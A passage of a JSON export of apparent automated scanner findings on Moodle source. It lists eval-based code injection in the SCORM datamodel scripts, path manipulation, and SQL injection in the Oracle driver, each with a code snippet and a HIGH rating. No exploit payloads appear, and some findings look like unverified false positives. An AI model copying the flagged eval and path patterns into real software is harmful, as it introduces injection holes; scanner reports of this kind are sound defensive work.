"endLineNumber": 179, "positionInEndLine": 42, "startLineNumber": 179, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " } else {\n errorCode = \"201\";\n }\n } else if (elementmodel.substr(elementmodel.length - countstr.length,elementmodel.length) == countstr) {\n parentmodel = elementmodel.substr(0,elementmodel.length - countstr.length);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + parentmodel + '\"]')) != \"undefined\") {\n errorCode = \"203\";\n } else {\n errorCode = \"201\";\n }\n } else {\n", "vulnerId": "APPCUT:62:14294", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 266, "positionInEndLine": 93, "startLineNumber": 266, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " // the generic element) so we can track changes to it\n eval('datamodel[\"' + scoid + '\"][\"' + element + '\"]=CloneObj(datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]);');\n }\n\n // check if the current element exists in the datamodel\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"]')) != \"undefined\") {\n\n // make sure this is not a read only element\n if (eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].mod') != 'r') {\n\n elementstring = '&' + underscore(element) + '=' + encodeURIComponent(data[property]);\n", "vulnerId": "APPCUT:62:14298", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 36, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 569, "positionInEndLine": 85, "startLineNumber": 569, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " subelement += '.' + elementIndexes[i++];\n }\n if (subelement == element) {\n errorCode = \"0\";\n if (scormdebugging) {\n LogAPICall(\"LMSGetValue\", element, eval(element), 0);\n }\n return eval(element);\n } else {\n errorCode = \"0\"; // Need to check if it is the right errorCode\n }\n", "vulnerId": "APPCUT:62:14297", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 71, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 259, "positionInEndLine": 80, "startLineNumber": 259, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " errorCode = \"0\";\n if (Initialized) {\n if (element != \"\") {\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n expression = new RegExp(eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format'));\n value = value + '';\n matches = value.match(expression);\n if (matches != null) {\n", "vulnerId": "APPCUT:62:14303", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 307, "positionInEndLine": 86, "startLineNumber": 307, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n eval(subelement + '.correct_responses = new Object();');\n eval(subelement + '.correct_responses._count = 0;');\n }\n }\n }\n element = subelement.concat('.' + elementIndexes[elementIndexes.length - 1]);\n", "vulnerId": "APPCUT:62:14307", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 330, "positionInEndLine": 99, "startLineNumber": 330, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " eval(element + ' = \"\";');\n }\n }\n }\n\n eval(cmiobj[scoid]);\n eval(cmiint[scoid]);\n\n if (cmi.core.lesson_status == '') {\n cmi.core.lesson_status = 'not attempted';\n }\n", "vulnerId": "APPCUT:62:14295", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 12, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 158, "positionInEndLine": 27, "startLineNumber": 158, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " break;\n case 'cmi.interactions.n.id':\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n var subobject = eval(subelement);\n subobject.objectives = new Object();\n subobject.objectives._count = 0;\n }\n break;\n case 'cmi.interactions.n.objectives.n.id':\n", "vulnerId": "APPCUT:62:14296", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 72, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 554, "positionInEndLine": 84, "startLineNumber": 554, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " nav = new Object();\n\n for (element in datamodel[scoid]) {\n if (element.match(/\\.n\\./) == null) {\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != 'undefined') {\n eval(element + ' = datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue;');\n } else {\n eval(element + ' = \"\";');\n }\n }\n }\n", "vulnerId": "APPCUT:62:14302", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 24, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 159, "positionInEndLine": 100, "startLineNumber": 159, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n eval(subelement + '.correct_responses = new Object();');\n", "vulnerId": "APPCUT:62:14292", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 325, "positionInEndLine": 81, "startLineNumber": 325, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range')) != \"undefined\") {\n range = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range');\n ranges = range.split('#');\n value = value * 1.0;\n if ((value >= ranges[0]) && (value <= ranges[1])) {\n eval(element + '=\"' + value + '\";');\n errorCode = \"0\";\n return \"true\";\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n", "vulnerId": "APPCUT:62:14300", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 347, "positionInEndLine": 75, "startLineNumber": 347, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " var expression = new RegExp(CMIIndex,'g');\n var elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format') != 'CMIFeedback') {\n expression = new RegExp(eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format'));\n } else {\n // cmi.interactions.n.type depending format accept everything at this stage\n expression = new RegExp(CMIFeedback);\n }\n value = value + '';\n", "vulnerId": "APPCUT:62:14299", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 56, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 479, "positionInEndLine": 117, "startLineNumber": 479, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": "\n // check if the current element exists in the datamodel\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"]')) != \"undefined\") {\n\n // make sure this is not a read only element\n if (eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].mod') != 'r') {\n\n elementstring = '&' + underscore(element) + '=' + encodeURIComponent(data[property]);\n\n // check if the element has a default value\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != \"undefined\") {\n", "vulnerId": "APPCUT:62:14304", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 572, "positionInEndLine": 86, "startLineNumber": 572, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 13, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " subelement = subelement.concat('.' + elementIndex);\n }\n if ((typeof eval(subelement)) == \"undefined\") {\n eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n", "vulnerId": "APPCUT:62:14440", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 321, "positionInEndLine": 87, "startLineNumber": 321, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " }\n $basenames = array(); // just for cache id\n foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n if (null === $firstMissingResource) {\n $firstMissingResource = $uri;\n continue;\n", "vulnerId": "APPCUT:62:14652", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " $allowDirs = array();\n foreach ((array)$cOptions['allowDirs'] as $allowDir) {\n $allowDirs[] = realpath(str_replace('//', $_SERVER['DOCUMENT_ROOT'] . '/', $allowDir));\n }\n $basenames = array(); // just for cache id\n foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 143, "positionInStartLine": 21, "positionInEndLine": 36, "appercutAttackItemId": 9265, "startLineNumber": 143}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " } catch (Exception $e) {\n $this->log($e->getMessage());\n return $options;\n }\n $files = explode(',', $_GET['f']);\n if ($files != array_unique($files)) {\n $this->log(\"Duplicate files were specified\");\n return $options;\n }\n if (isset($_GET['b'])) {\n // check for validity\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 120, "positionInStartLine": 26, "positionInEndLine": 46, "appercutAttackItemId": 9264, "startLineNumber": 120}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " foreach ((array)$cOptions['allowDirs'] as $allowDir) {\n $allowDirs[] = realpath(str_replace('//', $_SERVER['DOCUMENT_ROOT'] . '/', $allowDir));\n }\n $basenames = array(); // just for cache id\n foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n if (null === $firstMissingResource) {\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 144, "positionInStartLine": 16, "positionInEndLine": 36, "appercutAttackItemId": 9266, "startLineNumber": 144}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " }\n $basenames = array(); // just for cache id\n foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n if (null === $firstMissingResource) {\n $firstMissingResource = $uri;\n continue;\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 146, "positionInStartLine": 28, "positionInEndLine": 43, "appercutAttackItemId": 9268, "startLineNumber": 146}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " $allowDirs[] = realpath(str_replace('//', $_SERVER['DOCUMENT_ROOT'] . '/', $allowDir));\n }\n $basenames = array(); // just for cache id\n foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n if (null === $firstMissingResource) {\n $firstMissingResource = $uri;\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 145, "positionInStartLine": 16, "positionInEndLine": 56, "appercutAttackItemId": 9267, "startLineNumber": 145}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " $this->checkType($m[1]);\n } catch (Exception $e) {\n $this->log($e->getMessage());\n return $options;\n }\n $files = explode(',', $_GET['f']);\n if ($files != array_unique($files)) {\n $this->log(\"Duplicate files were specified\");\n return $options;\n }\n if (isset($_GET['b'])) {\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 119, "positionInStartLine": 12, "positionInEndLine": 45, "appercutAttackItemId": 9263, "startLineNumber": 119}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 28, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 146, "positionInEndLine": 43, "startLineNumber": 146, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range')) != \"undefined\") {\n range = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range');\n ranges = range.split('#');\n value = value * 1.0;\n if ((value >= ranges[0]) && (value <= ranges[1])) {\n eval(element + '=value;');\n errorCode = \"0\";\n if (scormdebugging) {\n LogAPICall(\"LMSSetValue\", element, value, errorCode);\n }\n return \"true\";\n", "vulnerId": "APPCUT:62:14439", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 364, "positionInEndLine": 65, "startLineNumber": 364, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/admin/mailout-debugger.php", "code": "\nif (isset($_SERVER['REMOTE_ADDR'])) {\n mdie(\"should not be called from web server!\");\n}\n\nif (isset($_ENV['TMPDIR']) && is_dir($_ENV['TMPDIR'])) {\n $tmpdir = $_ENV['TMPDIR'];\n}\n\n$tmpfile = $tmpdir . '/moodle-mailout.log';\n$fh = fopen($tmpfile, 'a+', false)\n", "vulnerId": "APPCUT:62:14659", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 30, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 41, "positionInEndLine": 53, "startLineNumber": 41, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/auth/cas/CAS/CAS.php", "code": "/**\n * The default directory for the debug file under Unix.\n */\nfunction gettmpdir() {\nif (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }\nif (!empty($_ENV['TMPDIR'])) { return realpath( $_ENV['TMPDIR']); }\nif (!empty($_ENV['TEMP'])) { return realpath( $_ENV['TEMP']); }\nreturn \"/tmp\";\n}\ndefine('DEFAULT_DEBUG_DIR', gettmpdir().\"/\");\n\n", "vulnerId": "APPCUT:62:14658", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 38, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 251, "positionInEndLine": 64, "startLineNumber": 251, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": " * @throws dml_connection_exception\n * @param string $sql\n * @return resource\n */\n protected function parse_query($sql) {\n $stmt = oci_parse($this->oci, $sql);\n if ($stmt == false) {\n throw new dml_connection_exception('Can not parse sql query'); //TODO: maybe add better info\n }\n return $stmt;\n }\n", "vulnerId": "APPCUT:62:14524", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": " /**\n * Try to add required moodle package into oracle server.\n */\n protected function attempt_oci_package_install() {\n $sqls = file_get_contents(__DIR__.'/oci_native_moodle_package.sql');\n $sqls = preg_split('/^\\/$/sm', $sqls);\n foreach ($sqls as $sql) {\n $sql = trim($sql);\n if ($sql === '' or $sql === 'SHOW ERRORS') {\n continue;\n }\n", "functionName": "Global.oci_native_moodle_database::attempt_oci_package_install", "endLineNumber": 1746, "positionInStartLine": 8, "positionInEndLine": 45, "appercutAttackItemId": 8977, "startLineNumber": 1746}, {"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": "\n /**\n * Try to add required moodle package into oracle server.\n */\n protected function attempt_oci_package_install() {\n $sqls = file_get_contents(__DIR__.'/oci_native_moodle_package.sql');\n $sqls = preg_split('/^\\/$/sm', $sqls);\n foreach ($sqls as $sql) {\n $sql = trim($sql);\n if ($sql === '' or $sql === 'SHOW ERRORS') {\n continue;\n", "functionName": "Global.oci_native_moodle_database::attempt_oci_package_install", "endLineNumber": 1745, "positionInStartLine": 8, "positionInEndLine": 75, "appercutAttackItemId": 8976, "startLineNumber": 1745}, {"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": " */\n protected function attempt_oci_package_install() {\n $sqls = file_get_contents(__DIR__.'/oci_native_moodle_package.sql');\n $sqls = preg_split('/^\\/$/sm', $sqls);\n foreach ($sqls as $sql) {\n $sql = trim($sql);\n if ($sql === '' or $sql === 'SHOW ERRORS') {\n continue;\n }\n $this->change_database_structure($sql);\n }\n", "functionName": "Global.oci_native_moodle_database::attempt_oci_package_install", "endLineNumber": 1748, "positionInStartLine": 12, "positionInEndLine": 29, "appercutAttackItemId": 8979, "startLineNumber": 1748}, {"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": " public function change_database_structure($sql, $tablenames = null) {\n $this->get_manager(); // Includes DDL exceptions classes ;-)\n $sqls = (array)$sql;\n\n try {\n foreach ($sqls as $sql) {\n $this->query_start($sql, null, SQL_QUERY_STRUCTURE);\n $stmt = $this->parse_query($sql);\n $result = oci_execute($stmt, $this->commit_status);\n $this->query_end($result, $stmt);\n oci_free_statement($stmt);\n", "functionName": "Global.oci_native_moodle_database::change_database_structure", "endLineNumber": 909, "positionInStartLine": 21, "positionInEndLine": 34, "appercutAttackItemId": 8982, "startLineNumber": 909}, {"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": " $sqls = (array)$sql;\n\n try {\n foreach ($sqls as $sql) {\n $this->query_start($sql, null, SQL_QUERY_STRUCTURE);\n $stmt = $this->parse_query($sql);\n $result = oci_execute($stmt, $this->commit_status);\n $this->query_end($result, $stmt);\n oci_free_statement($stmt);\n }\n } catch (ddl_change_structure_exception $e) {\n", "functionName": "Global.oci_native_moodle_database::change_database_structure", "endLineNumber": 911, "positionInStartLine": 31, "positionInEndLine": 48, "appercutAttackItemId": 8984, "startLineNumber": 911}, {"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": " * Try to add required moodle package into oracle server.\n */\n protected function attempt_oci_package_install() {\n $sqls = file_get_contents(__DIR__.'/oci_native_moodle_package.sql');\n $sqls = preg_split('/^\\/$/sm', $sqls);\n foreach ($sqls as $sql) {\n $sql = trim($sql);\n if ($sql === '' or $sql === 'SHOW ERRORS') {\n continue;\n }\n $this->change_database_structure($sql);\n", "functionName": "Global.oci_native_moodle_database::attempt_oci_package_install", "endLineNumber": 1747, "positionInStartLine": 17, "positionInEndLine": 30, "appercutAttackItemId": 8978, "startLineNumber": 1747}, {"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": " $this->get_manager(); // Includes DDL exceptions classes ;-)\n $sqls = (array)$sql;\n\n try {\n foreach ($sqls as $sql) {\n $this->query_start($sql, null, SQL_QUERY_STRUCTURE);\n $stmt = $this->parse_query($sql);\n $result = oci_execute($stmt, $this->commit_status);\n $this->query_end($result, $stmt);\n oci_free_statement($stmt);\n }\n", "functionName": "Global.oci_native_moodle_database::change_database_structure", "endLineNumber": 910, "positionInStartLine": 23, "positionInEndLine": 67, "appercutAttackItemId": 8983, "startLineNumber": 910}, {"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": " * @throws dml_connection_exception\n * @param string $sql\n * @return resource\n */\n protected function parse_query($sql) {\n $stmt = oci_parse($this->oci, $sql);\n if ($stmt == false) {\n throw new dml_connection_exception('Can not parse sql query'); //TODO: maybe add better info\n }\n return $stmt;\n }\n", "functionName": "Global.oci_native_moodle_database::parse_query", "endLineNumber": 347, "positionInStartLine": 16, "positionInEndLine": 43, "appercutAttackItemId": 8985, "startLineNumber": 347}, {"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": " foreach ($sqls as $sql) {\n $sql = trim($sql);\n if ($sql === '' or $sql === 'SHOW ERRORS') {\n continue;\n }\n $this->change_database_structure($sql);\n }\n }\n\n /**\n * Does this driver support tool_replace?\n", "functionName": "Global.oci_native_moodle_database::attempt_oci_package_install", "endLineNumber": 1752, "positionInStartLine": 19, "positionInEndLine": 50, "appercutAttackItemId": 8980, "startLineNumber": 1752}, {"sourceFileName": "moodle/lib/dml/oci_native_moodle_database.php", "code": " * @return bool true\n * @throws ddl_change_structure_exception A DDL specific exception is thrown for any errors.\n */\n public function change_database_structure($sql, $tablenames = null) {\n $this->get_manager(); // Includes DDL exceptions classes ;-)\n $sqls = (array)$sql;\n\n try {\n foreach ($sqls as $sql) {\n $this->query_start($sql, null, SQL_QUERY_STRUCTURE);\n $stmt = $this->parse_query($sql);\n", "functionName": "Global.oci_native_moodle_database::change_database_structure", "endLineNumber": 906, "positionInStartLine": 8, "positionInEndLine": 27, "appercutAttackItemId": 8981, "startLineNumber": 906}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionSql.html", "positionInStartLine": 16, "patternDescription": "If the application uses external data when generating SQL requests, and that data is not filtered, or is filtered improperly, the malicious user can manipulate the requests. As a result, the malicious user has read access to the database. If the system is compromised enough, the user might even get write/delete access to the information in the DBMS. Many DBMS also support file system operations, network operations, and OS commands, which gives the malicious user access to those as well, with careful SQL request crafting.", "appercutVulnerName": "Incorrect User Input Filtration during SQL Request Generations", "endLineNumber": 347, "positionInEndLine": 43, "startLineNumber": 347, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " for (element in datamodel[scoid]) {\n if (element.match(/\\.n\\./) == null) {\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != 'undefined') {\n eval(element + ' = datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue;');\n } else {\n eval(element + ' = \"\";');\n }\n }\n }\n\n eval(cmiobj[scoid]);\n", "vulnerId": "APPCUT:62:14435", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 24, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 258, "positionInEndLine": 44, "startLineNumber": 258, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/testing/classes/util.php", "code": "\n if (!file_exists(\"$CFG->dirroot/.git/$ref\")) {\n return null;\n }\n\n $hash = file_get_contents(\"$CFG->dirroot/.git/$ref\");\n\n if ($hash === false) {\n return 